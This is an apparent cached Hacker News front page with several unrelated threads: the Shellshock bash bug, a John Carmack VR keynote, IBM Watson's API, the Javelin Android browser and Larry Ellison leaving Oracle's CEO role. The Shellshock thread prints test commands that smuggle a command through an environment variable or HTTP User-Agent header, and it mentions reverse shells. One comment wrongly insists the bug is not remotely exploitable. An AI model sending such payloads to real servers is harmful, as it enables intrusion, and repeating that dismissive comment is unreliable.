fabulist 21 hours ago 3 replies      
Test your local machine:

export evil='() { :;}; echo vulnerable'; bash -c echo;

Vulnerable computers will print 'vulnerable'.

Test a CGI:

curl -i -X HEAD "http://website" -A '() { :;}; echo "Warning: Server Vulnerable"'

Vulnerable scripts will emit a "Warning" header. If you get a 405 error, try it with a GET request.

I don't know the PoC fo new version which wiggles around the patch.

I've tried the PoC on ksh, csh, and dash; if they're effected, its more nuanced. Its advisable to rename bash, and replace it with a symlink to dash; it shouldn't break any scripts, and even if it does its better than getting owned.

mv /bin/bash /bin/_bash

chmod ugo-x /bin/_bash

ln -s /bin/dash /bin/bash

patio11 22 hours ago 4 replies      
Yep. We're currently basically waiting to see which completes first: a) a patch for bash which actually works gets released and then trickles into the various ways to get it on every machine in the world or b) someone writes ~10 lines of payload code (download rootkit, execute, connect to IRC channel, join botnet, etc) and then just hits everything in IP4 space with a for loop. Optionally, the for loop gets distributed to new nodes joining the bot net.

If you cannot say "I run no Linux/Unix/MacOS/compatible/etc machine which connects other machines" you should be at battle stations right now. We're all racing against a for loop and the for loop will probably have a head start.

eah13 21 hours ago 2 replies      
Honest question: does this mean this vulnerability has been in bash for essentially its entire history and someone only discovered it now?

Seems quite likely that someone would have discovered it sooner, especially since it's so simple to exploit.

zaroth 19 hours ago 2 replies      
Shellshock is a perfect name coming after Heartbleed. But this bug is suffering from lack of marketing, lagging in the news behind the iOS update being pulled.

It's sad to see an RCE somewhere so widespread and so interwoven with other software. It's also costly because now I'm questioning server integrity, thinking about what should really be re-imaged. I assume there are many more like this in the CVE pipeline...

At some point I just have to live with the fact that outside access is possible to anyone so motivated.

dustingetz 21 hours ago 3 replies      
I have a macbookpro which is my developer workstation. It is in a default configuration, it is on 12 hours a day, always behind a NAT. What do I need to do to protect myself?
blocke 20 hours ago 0 replies      
Rogue DHCP servers should not be a problem in any decently engineered enterprise or college campus network. Cisco switches have included DHCP snooping for years which when used only allows authorized switch ports to act as a DHCP server. Any decent enterprise wireless platform should either have transparent firewall functionality to block client DHCP responses or an equivalent to DHCP snooping.

If you've properly deployed these tools you've greatly limit the potential impact of a DHCP based worm.

Home router? Anyone test this against Linksys junk yet?

hamstergene 9 hours ago 1 reply      
I'm really surprised how many people out there write CGI in Bash. That's one of the things which would have never crossed my mind.
Animats 20 hours ago 0 replies      
What about simply disabling CGI in Apache? If you're not using it, turn it off. Use "--disable-cgi" at Apache launch. This will break some "control panels", but you probably shouldn't be using a CGI-based control panel in 2014 anyway.
TheSoftwareGuy 22 hours ago 2 replies      
I didn't realize iOS and OS X DHCP could be vulnerable. This just went from "Man a lot of other people should be worried about this" to "shit, shit, shit, shit, shit", since I don't run a web server.
tdicola 22 hours ago 3 replies      
As someone who just runs an Ubuntu 14.04 desktop machine without any web server should I be concerned? I don't really see how anyone could remotely execute bash on my system.
urs2102 9 hours ago 0 replies      
What you can do:


If you need a temporary fix until there is a new update - this can prove to be quite useful.

ccvannorman 7 hours ago 1 reply      
Sorry in advance for noobing up this thread, but can you clarify this? As a Mac OS X user who connects to public wifi often, I'm still in the dark about whether I should literally turn off my wifi for now.. or am I safe?
grimtrigger 22 hours ago 1 reply      
Could anyone provide a simplified explanation for what this is and what it means?
milankragujevic 9 hours ago 1 reply      
Smart little tool to check if your website is vulnerable http://milankragujevic.com/projects/shellshock/ It can also do a deep check that checks many known URLs, not only the home page.
daviddede 9 hours ago 0 replies      
It absolutely is. Specially now with thousands of cPanel servers known to be vulnerable:


aus_ 21 hours ago 0 replies      
Shellshock is also "reverse-shell-able". This Python script relies on /dev/tcp which is not available by default on some distros. (Source: @ortegaalfredo) But you could probably rework it to use netcat.


deanclatworthy 19 hours ago 1 reply      
Can anyone outline some clear steps for those of us on Debian Squeeze who have not yet got a patch?
btown 22 hours ago 1 reply      
From one of the comments:

> The question isn't whether a CGI is written in bash, but if it calls out to bash no matter how indirectly. Lots of things use the system() libc function, so if /bin/sh is bash it's game over.

Is this true? Which systems are vulnerable to this by default?

pdkl95 21 hours ago 0 replies      
This is probably just a local problem in what I will euphemistically describe as my "very highly customized" shell, but... it might be useful to use "/usr/bin/env instad of just plain "env" in that one-liner test for the vulnerability.

(or maybe the "command" builtin instead? It seems to also 'properly' show the vulnerability as well, but I'm not if that would affect the test in some cases)

schniggie 17 hours ago 1 reply      
CVE-2014-6271 cgi-bin reverse netcat shell


walterbell 21 hours ago 3 replies      
What are the best OS-specific alternatives to bash, which could be linked to /bin/sh until bash fixes are stable?
ck2 21 hours ago 0 replies      
Patched all the CentOS machines hours ago, whew.

It's on yum now, just yum update

krunkosaurus 6 hours ago 1 reply      
Isn't this all just armchair prophesying? Let's see some screenshots actual exploits from anyone. It's hard to gain access to someone's shell unless it's 1990 and a server is using CGI-BIN. People are retweeting that this is "WORSE THAN HEARTBLEED!!!!111!" but Heartbleed literally left practically every server susceptible. I ran sample exploit code against a number of tests hosts and saw mysql queries and passwords streaming in plain text. Yeah shellshock is a big deal but I've yet to the ground rumble and shake and Y2K x 10000 happen. This seems like a big deal but it actually isn't. Most likely no one can access your shell. Patch and move on.
f00ber 17 hours ago 4 replies      
Oh stop this stupidity already. If you are not running a Web server that spawns bash when serving an HTTP request, then you are NOT vulnerable.

Are you running a Web server that uses CGI scripts written in shell or plain C that uses system() call? If you do, you have had other problems long before.

There are some grumblings about DHCP _client_ setups on Linux passing parameters via environment variables to shell scripts executed by bash, but I am yet to see this. This would be a problem, but probably easily fixable.

No need to panic or even patch anything (as always). If you running servers on your machine and allow inbound connections you should know exactly what those servers are and what they execute on behalf of external users.

This is NOT remotely exploitable.

It's an ad campaign for "security researchers" people.

Keynote by John Carmack at Oculus Connect 2014 [video]
288 points by ivank  5 days ago   48 comments top 16
iamshs 4 days ago 2 replies      
I am only 10 minutes into this talk, but John is one awesome speaker. No PR talk at all, he is speaking his mind freely and in fact started with shortcomings of the product. The segue between different sections is so smooth. I do not have background in VR, but he explains things so smoothly. He is just freely talking about supply chain, and what the product constitutes. And he has been standing in the same spot. What a genuine speaker. Also, looks like Facebook's influence has been minimal. There is just no iota of bullshit in him. I like him already. My first John Carmack video, and I am already hooked. Now onto watching the full video.
Laremere 4 days ago 1 reply      
I love it when John Carmack talks, because he doesn't do marketing speak, and he doesn't dumb down his content. It's just a brain dump of technical info until they (almost literally) kick him off the stage.
gnarbarian 5 days ago 0 replies      
Carmack has been a hero of mine since the mid 90s. He was also the inspiration for me to go into computer science. Always a pleasure to listen to such a technically dense talk on the cutting edge of a subject dear to me. I highly recommend his quake-con keynotes as well for those of you who like this video.
webwielder 5 days ago 3 replies      
Perhaps even more impressive than Carmack's technical chops is his ability to stand in a single spot for hours on end.
jayavanth 4 days ago 1 reply      
Michael Abrash's keynote is worth checking out! https://www.youtube.com/watch?v=KS4yEyt5Qes
justifier 4 days ago 3 replies      
it becomes its own form of marketing speech,carmack was the reason i got involved: financially, temporally, and mentally; and i think the organisation understands this as common for a number of people.. especially 'developers'

the oculus is digital stereoscopy

which is hard with simple stationary fixed objects(i),but combine it with inferred spherical screen encapsulation and it becomes a real challenge, probably a fun one too

you let carmack wax poetic on his interesting ideas to fix this tech and he will talk about latency and hertz and i'll listen with bated breath because i like hearing people talk about solutions to problems

but then i put the headset on and i realise these are hardly the problems befallen the proposed goal

i want someone to address that piece of a person that is lost when they put the headset on for the first time,it almost appears physical when you see it waft out of them

i lost it, my gamer friend who already preemptively developed a defensive cyncism to the tech lost it, the eleven year old i introduce hacking to lost it,and that last one was probably the most signifigant for me to see

i had been using the object sitting on top of my bookshelf as an incentivising mechanism:'finish your project and i'll let you use the oculus'; last week he pushed his finished project but i had other obligations the following week so he had to wait 'two! whole! weeks!' to get to use the oculus

when i picked him up the following week, uncharacteristically early this time.. we both are lax in our punctuallity but he refused to let me be late today so he came directly to me fifteen minutes early.. he went on and on about how he has been 'scared' all day:'scared, but like happy scared'; i tried to explain to him the concept of anxiety but his mind was hurling itself around all of what he was about to become witness to

i put the headset on him and he had fun with it, but when he took it off he became suddenly very pragmatic in his demeanor,he told me he thinks it hurt him,his head, his eyes, something.. he needed a glass of water,i explained that that was because instead of being a virtual reality in which he was transposed to the thing exploits an optical illusion which means your brain is doing a lot more work than it usually does trying to rectify the inconsistencies,if you've ever been frustrated by trying to see a sailboat in a magic eye you know what it feels like to use the oculus

i asked him his opinion:'honestly? ..well, unfortunately a little dissappointed';

i see my position as creating a safe environment for him to develop his ideas so naturally i challenged him to explain himself by defending the technological feat that he was holding in his hand,but the only thing we could talk about quickly became anything other than what we wanted to talk about

so we talked about the tech,i started going all carmack on him and we had fun talking tech but the conversation was clearly avoiding talking about the 'experience' one develops when wearing the headset

i wanted to know what he lost, and asked him to describe the thing he thought it was going to be,he was unable:'i don't know, just different, like? more 3d`ish'; in fashion i told him to explain himself explicitly stead superficially:'but what does that mean? what did you think it was going to be? describe that to me';

'i don't know anymore'

this i understood, but my experience was different,after wearing the headset i started to dream up better ways to do what i thought they were trying to do before i put it on,ways to do what i wanted from virtual reality,they are dreams and some built on the sort of technological feats of dreams but this was and still is my reaction each time i wear it

so yes john, tell me all about your brilliant ideas for fixing latency issues because this stuff is fun,but please acknowledge the baseline of this research is fundamentally flawed as it pertains to the proposed goals

i've stopped calling the oculus virtual reality,the oculus is digital stereoscopy




.(i) the first thing i did with the oculus was pull up two terminals, cat out some of my writing,align vertically,then slowly move one terminal into the field of view of the other eye until the text seemed to stop wonking my brain and really pop out at me

the experience was profound

so, i threw together a little browser playground with two 117px squares,one blue and one pink,i aligned them vertically then again slowly moved one into the field of view of the other eye,and i waited until those two distinct colors overlaid in my mind as a single purple

herein lies the problem:there was a multi pixel range where my brain would close the gap manually, out of my control and rather forcibly;it was impossible for me to find the perfect distance between the two divs,340pxs worked but so did plus or minus 4px from 344px,the perfect'exact`preferred`innate distance was undiscoverable because of the exception handling in my brain's interpretation of my visual input

.. edit:: gramm`err

asadlionpk 4 days ago 0 replies      
Just finished watching, I am impressed at how low-level/technical he can get without boring or confusing the audience.

I have some experience with technical speaking and its very hard to make a technical point without dumbing it down for the audience.

lucasgw 4 days ago 2 replies      
I was in the room - he is a truly dynamic speaker and obviously a super-intelligent guy. I think he went off the rails a bit with the suggestion of interlacing as a potential solution. That makes little sense to me. It's, at best, a short-term solution once you get fast enough displays and rendering. (And as an old-time video guy... just... god, please... no...)
asciimo 4 days ago 1 reply      
While listening to all of the mitigation strategies that Carmack proposed for the technological challenges, I wondered if you could hack the user. What about drugs? Is there something that can reduce our sensitivity to low-frequency displays and yaw lag? At the very least, motion sickness drugs?
riffraff 4 days ago 1 reply      
Sorry for the somewhat lame question, but is he always that still?

I'm 10 minutes in and I don't think he moved his feet once, and his right hand just a couple times.

It feels very weird for me to watch and I just noticed it now, is there something wrong with me?

Jacky800 3 days ago 0 replies      
John Carmack is great technical speaker. His interesting thoughts flows in a continuous stream and as a listener its almost impossible to get distracted.

I wish Carmack does an interview like the one in "Coders at work" format where we can get some insight on

How he approaches debugging,

what tools he uses apart from visual studio.

How does he approaches already existing large code base?

What is the optimal duration to code without interruption.

What techniques does he use to get in to flow state e.t.c..

walterbell 4 days ago 0 replies      
Nice use of keynote to directly present requirements to engineers throughout the display supply chain, especially in large companies like Samsung.
vertis 4 days ago 0 replies      
This keynote was by far the highlight of the entire conference for me

Second were the amazing demos on the Crescent Bay prototype

Kenji 4 days ago 0 replies      
Nothing Carmack does is ever boring. This man is a huge inspiration for me.
Vanayad 4 days ago 1 reply      
Can anyone tl;dr the new stuff in this version of the oculus prototype ?
bsaul 4 days ago 1 reply      
Anyone's got a link to the slidedeck ?
IBM Watson API
298 points by miket  1 day ago   84 comments top 13
pesenti 1 day ago 13 replies      
IBM is about to make these APIs (and many others) much more accessible as part of BlueMix (https://ace.ng.bluemix.net/ - the IBM PaaS/Heroku). I lead the team in charge of developing the Watson platform. Ask me questions!
mooreds 1 day ago 1 reply      
If you want access to the API, you have to fill out a form, here: http://www.ibm.com/smarterplanet/us/en/ibmwatson/form_ecosys...

This is buried in the docs as a comment on this page: https://developer.ibm.com/watson/docs/developing-watson-apis...


No real support for 'playing around' with the API. Bummer.


Just went through the application process linked above. Be prepared to give info about yourself and your company and an explanation of why you want access to the Watson API, as well as what type of information you'll be working with. I stated 'just want to play around with the API'. We'll see how they react to that.

readerrrr 1 day ago 4 replies      
Out of curiosity I googled the same request.


I think this might be useful if Watson was being feed with a medical database. Otherwise I don't see any need for it; is there any?

edit: Watson as a legal consultant would be great. There might be a product in that, not as an replacement for a lawyer but more as guide/search tool.

malanj 1 day ago 4 replies      
Has anyone at HN used either IBM Watson or Wolfram Alpha to build a real (commercial) app? It feels like there should be a whole wave of apps built on either of these technologies but it doesn't seem to be materialising.

What is holding back the killer apps for answer/computation engines?

mark_l_watson 1 day ago 0 replies      
I am helping a customer integrate Watson into their system so I am very happy to see the news about BlueMix (https://ace.ng.bluemix.net/) that apparently will allow me to keep experimenting with Watson after my consulting engagement is complete.

If you read the documentation, you will see that preparing training data and questions is fairly straightforward.

beebs93 1 day ago 0 replies      
I sent a e-mail to my co-workers containing "...natural English to ask Watson..." and somehow people read it as "You can ask Emma Watson, who is English, a question and she will respond".

And I thought, "...close enough - Watson could answer questions about Emma".

mooreds 1 day ago 0 replies      
I found the link above to be a bit useless as it jumps right into getting answers with evidence. Here's a better overview link: https://developer.ibm.com/watson/docs/developing-watson-apis...
Tyrant505 1 day ago 0 replies      
Does this also give access to their cooking and recipe data?

Edit: http://www.ibm.com/smarterplanet/us/en/cognitivecooking/

yatoomy 1 day ago 0 replies      
Ive been looking into Watson's new application to analytics etc. How would that compare to say Mathimatica or the Wolfram Language/Data Science Platform?
kyberias 1 day ago 0 replies      
Looking at that example, I wonder why that Porcaro quote is listed as evidence. It doesn't relate to Jackson's album at all.
ilaksh 1 day ago 1 reply      
So you just ask it any random question and it knows everything? Or only things that come up on Jeopardy?

I don't see an API for feeding it information.

Doublon 1 day ago 0 replies      
"Questions" in the documentation without question mark (?) seem somehow wrong to me.
80ProofPudding 1 day ago 0 replies      
Waiting for my coffee to brew, I read that as "Emma Watson API".
Show HN: Javelin Browser
276 points by nubela  9 hours ago   93 comments top 31
TheCraiggers 8 hours ago 2 replies      
I've been using your browser for a couple months now (I think I saw it mentioned on Android Police if you're curious) and I've been liking it. It looks slick, and works exactly how I think it should. The one problem I have with it is one I'd like other opinions on, both for my curiosity and your benefit.

Frankly, it's not my daily driver because I don't know who you are and don't trust you. Using a (no offense) no-name browser is somewhat of a risk as the developer could potentially be recording personal info. Of course, I have no guarantee that Mozilla isn't either. However, and yes I'm fully aware of how silly this sounds, I trust Mozilla despite never looking at their code or knowing any of the developers.

I'm guessing privacy is important to you (since you have the option of using a VPN service as IAP) so I'm curious how you would allay my fears of using a random browser from someone other than the big three.

Either way, I wish you luck.

roryokane 4 hours ago 0 replies      
Bug reports for the developer nubela:

Swipe from the left to open the menu, then scroll down, so that part of the text is cut off, then swipe to the left to close the menu part of the way, but drag your finger back right before the menu closes. If you now scroll, the cut-off text is still visible, creating weird visual artifacts. This goes away when you close the menu completely and reopen it.

When I edit the title and URL of a bookmark, the buttons are Cancel and Edit. I think Save would work better. I feel like what I am doing is already editing, since I chose Edit to get here.

I tried to set Javelin as the default browser, but when the browser list popped up, by reflex I hit Just Once instead of Always. But Javelin still said Javelin is now your default browser. (Then I realized what had happened and went back and did it again.) If possible, Javelin should detect when the user clicked the wrong button. If that is not possible, maybe you should show a small picture of the Always button before showing the dialog, to remind the user to hit that button.

In the page describing the Pro features, one of them is choosing your homepage. But I can already do that in the free version. It works when I go to Settings > Change homepage.

Javelin doesnt support a blank homepage. I tried setting the homepage to nothing () or to about:blank, but either way, the homepage just becomes Webpage not available. The error shows because Javelin is automatically adding an http:// before about:blank about: pages should have no protocol.

I tried to press and hold on the icons (the eye icon and share icon) in the toolbar to see a tooltip describing what they do. However, those icons dont have tooltips. I would have liked to have been able to see a Reading Mode tooltip when I pressed and held on the eye icon instead of having to actually press it to find out. The icons in the toolbar for reading mode have the same problem.

When there are no tabs, I see a message Javelin Browser, flies. The message confused me a bit because it is ungrammatical. It should be either Javelin Browser flies. or Javelin Browser it flies.

I couldnt get Javelin Sync to work at all. I authorized it for my Google account and saw the message saying I have been sent an email. But my bookmarks are still the default Javelin ones (minus the ones I manually deleted); none of them are my Chrome for Android bookmarks. This is still the case even after I Sync bookmarks now though since that command gives no feedback, I couldnt tell whether it worked. (I didnt install the desktop Chrome extension linked in the email because I dont want that home page, but the email said my device was already synced, so that shouldnt make a difference.) So either your Sync is broken or there is another step that you forgot to mention, like wait one hour or restart your phone or something.

In the menu on the left, the checkboxes look a little weird, because it is a blue checkmark on a turquoise background. I can see it, but I think they would look better if you made the check-marks very light gray, a color closer to the text but still distinct from it.

When I logged into a site, I got two dialog boxes asking me to save the password. The first was a generic Android one like in Google Chrome. I clicked Not Now, and then Javelin showed its colorful one at the bottom. You should hide the default one so that only the Javelin one shows.

I couldnt figure out how to activate the Fullscreen Browsing that you show in one of your websites screenshots. I tried scrolling through web pages, and I looked at all the settings, but I never had the Action Bar and the soft buttons displaying but transparent like in the screenshot. The soft buttons are always visible. I can hide the Action Bar completely with that setting, but then I cant open it all from within the app, and thats different from the screenshot anyway. Its not described as a Pro feature on the Enable Javelin Pro page either. You should make it more obvious how to enable that mode, or remove the screenshot if that feature is now gone.

This is a big list of bugs, many tiny ones and some big ones, but Im still trying out Javelin for now you havent driven me back to Chrome yet. I am especially interested in your Adblock and full-screen features (so its too bad I cant figure out how to use full-screen). I wish you luck with developing your browser.

nubela 8 hours ago 1 reply      
Developer here!

I've been working on Javelin since Feb this year and this is the 4th iteration, and on Reddit (r/android), and just a quick interesting byte. Javelin actually started as a "porn" browser! See: http://www.reddit.com/r/Android/comments/1xblv9/hey_reddit_s...

PS: I'm headed to SF in October, anyone wanna grab a beer/coffee? I'm contactable at hello@javelinbrowser.com

ClifReeder 6 hours ago 2 replies      
I notice that you use www.theverge.com in a number of the screenshots for Javelin. The writers at The Verge, the developers that build the site, the designers that make it beautiful - are all paid through ad revenue. Please consider at least adding the ability to whitelist sites if you are going to bundle ad block.

*Full disclosure - I am a developer at Vox Media, the publisher of The Verge.

robotfelix 5 hours ago 0 replies      
To me, including "mobile-first" as one of your key value proposition seems a little odd.

My immediate reaction was to wonder whether any mobile browsers aren't mobile-first? From my (incomplete) knowledge of smartphone browsers they all feature interfaces designed for smartphones and smartphones alone.

There must be a better word to use in your tagline - I notice you decided on using "Truly Mobile" further down ;)

this_user 8 hours ago 0 replies      
Why would I want to use a browser made by a group that is seemingly mostly preoccupied with design judging from your website? You don't even disclose who is really behind this project. Especially browser security is more important than ever. When using one made by Google or Mozilla I can be sure that they do take security seriously, have the necessary experience, technical know-how and manpower to deal with vulnerabilities in a timely manner.
phpnode 8 hours ago 1 reply      
I think you're making a mistake by offering this for free.

The kind of people who care enough about their web experience to install a new browser are the kind of people who won't mind parting with a few $ to do so.

To be profitable, free apps must target the broader market, but this is a relatively niche product. I don't think you'll get enough IAP fast enough to be sustainable.

l33tbro 4 hours ago 0 replies      
Awesome browser. But why use "gorgeous" as a descriptor? It's become such a meaningless term in tech, even when Jobs was still peddling it about.

It seems trivial, but seeing that word often is a red flag for an uninspired product. You guys have done great work, so I'm surprised your marketing isn't as great as the browser. Best of luck

tambourine_man 36 minutes ago 0 replies      
Ironically, I get a blank page on my iPhone
shock 7 hours ago 1 reply      
It looks very good. It's a pity it only syncs with Chrome and not with Firefox.
instakill 7 hours ago 2 replies      
Ha! Reddit definitely doesn't look that great on mobile.
blntechie 8 hours ago 2 replies      
I used it for about 3-4 months when 'Stack' was introduced but went back to Link Bubble + Chrome. I couldn't exactly remember why I went back to LB + Chrome but mostly due to 'Stack' being too rigid to my liking compared to Link Bubble (back button not closing the stack, no easy jumping between stacks, scrolling and stack animations kind of wonky etc.)

All things said, I loved the browser experience. Especially easy access to bookmarks on right edge swipe and always available refresh button. I will definitely try it again. Speed dial looks good.

Edit: Just installed again and wow!! It totally looks different from the version I used some time back. Looks more slick and pretty now. Will definitely try again. Especially the 'Stack' behavior.

ezequiel-garzon 6 hours ago 1 reply      
You had me at "reading mode". I can't believe text wrap, pervasive in smart- and not-so-smart-phones of yore, is today considered a rarity. Thankfully I'm not alone [1].

[1] https://code.google.com/p/android/issues/detail?id=62378

jonalmeida 7 hours ago 0 replies      
Just out of curiosity, what are you using to parse the reading view of a webpage. It seems really fast so I doubt you're using Readability; probably some local library?
fdsary 6 hours ago 0 replies      
Wow, this makes me want to ditch my iPhone...
microsby0 6 hours ago 0 replies      
Any thoughts of an iOS version as well? This really makes me jealous of Android users
zanethomas 8 hours ago 2 replies      
I'm interested but don't want to use the "play" store. Can you provide some other download link?
joshvm 6 hours ago 0 replies      
My only criticism is that the icon is practically a mirror image of Telegram, but that's not exactly your fault.

Is there a way to save pages for offline viewing?

Miraries 8 hours ago 1 reply      
Any particular reason it's not compatible with OnePlus One and Nexus 10 on Google Play? I get it if tablets aren't supported. I could get the apk but I was wondering...If testing is the reason, I can help.
grumblestumble 7 hours ago 1 reply      
Very minor nitpick: Your usage of "thought out" comes across as stilted and unprofessional. I'm guessing English isn't your native language?
shreeshga 6 hours ago 0 replies      
Just curious, which browser engine does it use?
cmdrfred 7 hours ago 1 reply      
Looks good. Adblock integration is a nice touch, thats pretty much my first line of defence when it comes to anti-malware on the systems I administrate.
spihn3 5 hours ago 0 replies      
Adblock and readability feature integration is great! As a developer, could I ask you how you are implementing the readability feature? Is this done client side?
Kiro 8 hours ago 1 reply      
What rendering engine are you using?
thrush 8 hours ago 1 reply      
Slightly unrelated question, but is there an equivalent for iOS app extensions on Android?
ahstilde 8 hours ago 1 reply      
I like it a lot! Any way you could have it sync with Firefox?
anishkothari 8 hours ago 0 replies      
Looks great! I'm going to try this out
ultim8k 7 hours ago 0 replies      
Kudos man! It really looks beautiful.
jessedhillon 7 hours ago 2 replies      
I like it a lot. But I have a tangential question: has anyone found a good writeup on rise of the use of adjectives like gorgeous, stunning, beautiful, amazing to describe apps? Aside from my personal opinion, I'd like to know if anyone else has observed and written about this trend.
N0RMAN 8 hours ago 1 reply      
Why do you offer it for free?
robinhoodexe 8 hours ago 0 replies      
Looks pretty slick!
Larry Ellison Will Step Down as CEO of Oracle, Will Remain as CTO
271 points by jhonovich  7 days ago   89 comments top 13
chollida1 7 days ago 5 replies      
Interesting that they name Co-CEO's in Catz and Hurd. I wonder how that will work, especially given Hurd's "tough to work with" reputation.

Interestingly Ellison will be the CTO. This could be a shit show with 3 people trying to run the show!

I mean does anyone really expect Larry Ellison to start taking marching orders. Will be interesting to watch the short interest on this company!

I think the two headed CEO is what the street expected all along as Catz has been around for ever and alot of people thought that Hurd, the former HP CEO, was promised the CEO title when Ellison resigned.

It looks like they, Catz and Hurd, will split the running of day to day operations as Hurd gets sales, marketing and strategy reporting to him, while Catz will continue to have finance, legal and manufacturing.

Its down about a dollar after the close on about a third higher trading volume than normal. So it doesn't look like anyone is "spooked" by the news.

dm8 7 days ago 1 reply      
If you want to read about Larry Ellison's personality and his management style, you should read - "The Difference Between God and Larry Ellison: Inside Oracle Corporation; God Doesn't Think He's Larry Ellison". (http://www.goodreads.com/book/show/181369.The_Difference_Bet...)

It's one of the best books written on him and the way he managed Oracle right from it's beginnings. He was damn good at selling things.

mindcrime 7 days ago 1 reply      
Not really sure what to say about this. I don't know Ellison, nor do I own Oracle stock, or have any particular interest in Oracle per-se. But nonetheless, I've always seen Ellison as an important character in our industry, and after reading a biography about him, I felt a sort of kinship with him based on some shared interests.

At any rate, it definitely feels like the "end of an era" in a sense. I got my start in this industry in the mid to late 90's when Oracle, IBM, Novell, Microsoft, Borland, etc. were duking it out for supremacy, and - for better or worse - you've never really been able to escape Oracle's shadow to some extent. And Ellison was Oracle, in so many ways.

Edit: It's been a while, but I think this[1] was the biography I read. I'll just say this: regardless of what you think of Ellison, he's an interesting character and reading about the history of Ellison / Oracle is quite fascinating.

[1]: http://www.amazon.com/Softwar-Intimate-Portrait-Ellison-Orac...

smacktoward 7 days ago 0 replies      
I'm guessing he wants to spend more time wringing extortionate license fees out of his family?
ChuckMcM 7 days ago 1 reply      
Demonstrating once again that tech companies really don't "get" succession planning :-) I'm kind of half joking, if you look at a bunch of 'old school' BigCorps, the progression is (CEO->Chairman, SVPx -> CEO, VPx -> SVPx) and then the Chairman of the board retires and the CEO takes on both roles Chairman and CEO, priming the pump for the next cycle.

Co-CEOs have so far been an experiment in disaster, something about not having an ultimate authority seems to really crimp organizations. I wish Oracle well but they have a lot of challenges to overcome, if I were a share holder I wouldn't be all that pleased with this arrangement as it seems to basically leave all the same people in place with all the same problems (Amazon/Google EC2/GCE, MySQL vs NoSQL vs expensive Oracle, Cheap Clusters with High Reliablity vs Expensive Servers, Etc.)

bsimpson 7 days ago 0 replies      
Someone in The Verge's comment section noted that this Forbes list will now need to be updated:


spindritf 7 days ago 1 reply      
The final Larry Ellison scorecard: Oracle stock is up 89,640% since he took the company public in March 1986.


turar 7 days ago 9 replies      
Co-CEOs? I only know one company that had co-CEOs, and that didn't work out well for them.
sebst 7 days ago 0 replies      
joelrunyon 7 days ago 4 replies      
Are there any more details into why he's doing this?
azifali 7 days ago 0 replies      
The end of an era for Oracle that existed as a software (licensing) company. I think that Ellison stepping in as the CTO is probably more important than him stepping down as the CEO.

This move will perhaps will lay the groundwork for the next tens of billions in revenue for Oracle, in cloud based software and infrastructure.

sebst 7 days ago 1 reply      
Will Oracle then become better? Maybe as good as Sun used to be?

just dreamin'...

justinph 7 days ago 3 replies      
What is with the capitalization on the headline on Recode? I read it and thought, who is "Will Remain"?

It should be:Larry Ellison will step down as CEO of Oracle, will remain as CTO

Headline capitalization is pretty easy: Capitalize the first word, then any proper nouns. That's it.

       cached 26 September 2014 02:11:01 GMT